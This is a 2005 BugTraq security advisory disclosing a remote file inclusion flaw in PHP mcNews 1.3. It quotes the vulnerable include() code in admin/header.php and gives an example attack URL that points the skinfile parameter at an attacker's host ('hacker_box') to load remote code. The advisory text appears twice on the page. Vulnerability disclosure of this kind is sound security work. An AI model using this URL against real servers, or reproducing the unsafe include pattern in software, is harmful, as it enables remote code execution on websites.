BugTraq
Back to list
|
Post reply
PHP mcNews <= 1.3 arbitrary file inclusion (VXSfx)
Mar 07 2005 07:45PM
Filip Groszynski (groszynskif gmail com)
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: PHP mcNews
Version: 1.3
Homepage: http://www.phpforums.net/index.php?dir=dld
Author: Filip Groszynski (VXSfx)
Date: 7 March 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Vulnerable code in mcNews/admin/header.php:
<?
// mcNews 1.3 Marc Cagninacci marc (at) phpforums (dot) net [email concealed]
?>
...
<?
if($voir!='') {
$skinfile=strstr($skinfile, 'skin');
include ("$skinfile");
?>
...
--------------------------------------------------------
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_bo
x]/
--------------------------------------------------------
Contact:
Author: Filip Groszynski <VXSfx>
Location: Poland <Warsaw>
Email: groszynskif <at> gmail <dot> com
HP: http://shell.homeunix.org
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: PHP mcNews
Version: 1.3
Homepage: http://www.phpforums.net/index.php?dir=dld
Author: Filip Groszynski (VXSfx)
Date: 7 March 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Vulnerable code in mcNews/admin/header.php:
<?
// mcNews 1.3 Marc Cagninacci marc (at) phpforums (dot) net [email concealed]
?>
...
<?
if($voir!='') {
$skinfile=strstr($skinfile, 'skin');
include ("$skinfile");
?>
...
--------------------------------------------------------
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_bo
x]/
--------------------------------------------------------
Contact:
Author: Filip Groszynski <VXSfx>
Location: Poland <Warsaw>
Email: groszynskif <at> gmail <dot> com
HP: http://shell.homeunix.org
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
[ reply ]